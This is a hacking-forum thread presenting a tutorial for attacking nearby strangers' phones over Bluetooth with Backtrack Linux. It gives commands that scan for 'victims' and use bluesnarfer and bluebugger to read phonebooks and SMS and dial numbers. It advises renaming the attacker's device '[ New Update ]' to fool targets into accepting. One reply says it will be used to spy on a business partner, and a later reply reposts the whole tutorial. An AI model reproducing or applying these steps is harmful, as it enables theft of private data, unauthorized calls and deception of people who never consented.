Sinisterly
Bluetooth Hack and configure [Linux] /Backtrack. - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Computers (https://sinister.ly/Forum-Computers)
+--- Forum: Operating Systems (https://sinister.ly/Forum-Operating-Systems)
+--- Thread: Bluetooth Hack and configure [Linux] /Backtrack. (/Thread-Bluetooth-Hack-and-configure-Linux-Backtrack)



Bluetooth Hack and configure [Linux] /Backtrack. - spaceink - 04-14-2011

DIdnt find any tutorial for Backtrack Bluetooth "hacking" so i thought i could share this . .
i tried this in town and it works sometime as long as the victim actually ac cept it, i cant call it a hack but there arent that much bluetooth guides out there so . .

For Backtrack :

Configure rfcomm first, if you havent already done that,


Code:
mkdir -p /dev/bluetooth/rfcomm


Code:
mknod -m 666 /dev/bluetooth/rfcomm/ 0 c 216 0


Code:
mknod --mode=666 /dev/rfcomm0 c 216 0


Code:
hciconfig hci0 up


Code:
hciconfig hci0


(Scan for victims)


Code:
hcitool scan hci0


(ping the vitcim to see if he is awake)

Code:
l2ping  < victim mac addr>


(browse the victim for rfcomm channels to connect to)

Code:
sdptool browse --tree --l2cap < mac addr >


(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)

Code:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >

(to see available opions to do )

Code:
bluebugger -h


(Dial number )

Code:
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >


.......................

Maby not the greatest tutorial but if you arent experienced with bluetooth in backtrack you can always try this,


it works 4 / 10 times in town so maby not the greatest way to hack bluetooth phones but its fun when you suc ceed.


I usually change my Device name to [ New Update ] or [ you entered a new time zone ] so it doesn't sound so suspicious and its more likely that the victim ac cepts, unless he has a Pin passwd then you are pretty much screwed.

Its my first tutorial so dont judge me to hard ^^, but its always good to share the things you know right? =)





RE: Bluetooth Hack and configure [Linux] /Backtrack. - Mantoli - 04-15-2011

Nice, thanks Smile
will be useful spying on my biz partner xD


RE: Bluetooth Hack and configure [Linux] /Backtrack. - 6huittjay9 - 09-07-2024

[quote="spaceink" pid='313728' dateline='1302819855']
DIdnt find any tutorial for Backtrack Bluetooth "hacking" so i thought i could share this  . .
i tried this in town and it works sometime as long as the victim actually ac cept it,  i cant call it a hack but there arent that much bluetooth guides out there so . .

For Backtrack :

Configure rfcomm first,  if you havent already done that,


Code:
mkdir -p /dev/bluetooth/rfcomm


Code:
mknod -m 666 /dev/bluetooth/rfcomm/ 0 c 216 0


Code:
mknod --mode=666 /dev/rfcomm0 c 216 0


Code:
hciconfig hci0 up


Code:
hciconfig hci0


(Scan for victims)


Code:
hcitool scan hci0


(ping the vitcim to see if he is awake)

Code:
l2ping  < victim mac addr>


(browse the victim for rfcomm channels to connect to)

Code:
sdptool browse --tree --l2cap < mac addr >


(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)

Code:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >

(to see available opions to do )

Code:
bluebugger -h


(Dial number )

Code:
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >


.......................

Maby not the greatest tutorial but if you arent experienced with bluetooth in backtrack you can always try this,


it works 4 / 10 times in town so maby not the greatest way to hack bluetooth phones but its fun when you suc ceed.


I usually change my Device name to [ New Update ] or [ you entered a new time zone ] so it doesn't sound so suspicious and its more likely that the victim ac cepts, unless he has a Pin passwd then you are pretty much screwed. 

Its my first tutorial so dont judge me to hard ^^, but its always good to share the things you know right? =)


thank you